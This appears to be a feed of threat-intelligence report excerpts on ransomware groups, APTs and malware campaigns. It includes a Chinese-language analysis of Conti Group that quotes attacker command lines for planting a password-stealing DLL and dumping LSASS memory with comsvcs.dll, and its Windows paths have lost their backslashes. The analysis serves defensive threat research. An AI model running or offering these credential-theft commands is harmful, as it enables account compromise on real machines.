Executive Summary

Ransom Cartel is ransomware as a service (RaaS) that surfaced in mid-December 2021. This ransomware performs double extortion attacks and exhibits several similarities and technical overlaps with REvil ransomware. REvil ransomware disappeared just a couple of months before Ransom Cartel surfaced and just one month after 14 of its alleged members were arrested in Russia.…

Executive SummaryThe cyber mercenary group known as Void Balaur continues to expand their hack-for-hire campaigns into 2022 unphased by disruptions to their online advertising personas. New targets include a wide variety of industries, often with particular business or political interests tied to Russia. Void Balaur also goes after targets valuable for prepositioning or facilitating future attacks.…
Executive Summary

NullMixer is a dropper leading to an infection chain of a wide variety of malware families. NullMixer spreads via malicious websites that can be found mainly via search engines. These websites are often related to crack, keygen and activators for downloading software illegally, and while they may pretend to be legitimate software, they actually contain a malware dropper.…

Executive Summary

Cybercriminals compromise domain names to attack the owners or users of the domains directly, or use them for various nefarious endeavors, including phishing, malware distribution, and command and control (C2) operations. A special case of DNS hijacking is called domain shadowing, where attackers stealthily create malicious subdomains under compromised domain names.…

Broadcom Software, has gained insight into the current activities of a group we call Webworm. The group has developed customized versions of three older remote access Trojans (RATs), including Trochilus, Gh0st RAT, and 9002 RAT. At least one of the indicators of compromise (IOCs) observed by Symantec was used in an attack against an IT service provider operating in multiple Asian countries, while others appear to be in pre-deployment or testing stages.…

Cisco Talos recently identified a new, ongoing campaign attributed to the Russia-linked Gamaredon APT that infects Ukrainian users with information-stealing malware. The adversary is using phishing documents containing lures related to the Russian invasion of Ukraine. LNK files, PowerShell and VBScript enable initial access, while malicious binaries are deployed in the post-infection phase.…
Key TakeawaysIn mid-2022, TA453 deployed a social engineering impersonation technique informally called Multi-Persona Impersonation in which the threat actor uses at least two actor-controlled personas on a single email thread to convince targets of the legitimacy of the campaign. This is an intriguing technique because it requires more resources be used per target—potentially burning more personas—and a coordinated approach among the various personalities in use by TA453.…
It has now been six months since the war in Ukraine began. Since then, pro-Russian and pro-Ukrainian hacker groups, like KillNet, Anonymous, IT Army of Ukraine, Legion Spetsnaz RF, have carried out cyberattacks. A lesser-known group called NoName057(16) is among the pro-Russian groups attacking Ukraine and the countries surrounding it and siding with Ukraine.…

Raspberry Robin and Dridex: Two Birds of a Feather

IBM Security Managed Detection and Response (MDR) observations coupled with IBM Security X-Force malware research sheds additional light on the mysterious objectives of the operators behind the Raspberry Robin worm. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure and functionality.…

As we continue to monitor the cyber situation in Ukraine, the data we are seeing shows some interesting trends. Not only has the volume of attacks continued rising throughout the war in Ukraine, the types of attacks have been varied. A common tactic of cyber criminals is to run automated exploit attempts, hitting as many possible targets as they can to see what gets a result.…

奇安信威胁情报中心一直在对俄语威胁者以及活跃的地下论坛保持高强度的跟踪,最近我们观察到闻名全球的Conti Group在这半年内使用Exchange漏洞对风险投资公司、奢侈品企业、芯片制造业、外企合资制造业发起定向性攻击活动,这些被攻击的企业都有一个共同的特点:“富有”。

Conti Group是现阶段最活跃的勒索团伙之一,根据境外友商cyberint去年的发布的报告[1],Conti Group在2021年成功开展了600次攻击活动,共盈利27亿美元。由于在2022年2月份Conti Group的高管宣称在俄乌战争中站队俄罗斯一侧,导致其内部数据被人在Twitter上公开。

cyberint对泄露的信息进行分析后发现,Conti Group内部人员高达400余人,分工之细堪比一家小型科技公司。

美国《连线》杂志称[2]泄露的聊天记录表明Conti Group与APT29存在临时性的合作。

除了Conti Group,我们也观察到其他俄语威胁者通过爆破主流数据库或者利用Nday漏洞的形式植入CobaltStrike或者anydesk远程控制软件,等到时机成熟后下发GlobeImposter或者Leakthemall勒索软件,我们将其命名为BruteSql Group。我们在上半年曾经发表过《死灰复燃!新型REvil勒索软件在野攻击活动分析》[3]介绍了REvil勒索软件最新的攻击活动,但是在之后的数月里并没有看到类似的攻击活动,暗网页面也没有更新,攻击团伙转入了不活跃的状态。

与之前的文章类似,本文内容也仅仅是对Conti Group在过去半年时间内攻击手法做一个分享。文末会分享该团伙历史使用的IOC,供友商追踪溯源。

Conti Group

Conti Group通过Exchange漏洞与目标机器建立隧道连接,之后向windowssystem32目录下投递名为lsass.dll的密码窃取后门。执行的命令行如下:


cmd.exe /c !uplaod D:UchebkaworkSOFTLSASSlsass.dll -dest C:Windowssystem32lsass.dll

reg.exe add “HKLMSYSTEMCurrentControlSetServiceslogincontrollNetworkProvider”  /v “ProviderPath” /t “REG_EXPAND_SZ” /d  “C:Windowssystem32lsass.dll”

cmd.exe /c dir  c:windowstemptmpQWER.tmp

rundll32 C:WindowsSysnativecomsvcs.dll, MiniDump 668 c:windowstemptmpQWER.dmp  full

从命令行中可以看到Conti Group攻击者的工作路径,Uchebka经过查询是东欧地区人的姓氏。





On July 7, 2022, the CISA published an alert, entitled, “North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector,” related to a Stairwell report, “Maui Ransomware.” Later, the Department of Justice announced that they had effectively clawed back $500,000 in ransom payments to the group, partly thanks to new legislation.…

In April 2022, PT Expert Security Center detected an attack on a number of Russian media and energy companies that used a malicious document called «list.docx» to extract a malicious payload packed with VMProtect. Having analyzed the network packet, we found it to be identical to the one we studied in our report on APT31 tools, suggesting that these may belong to one and the same group.…

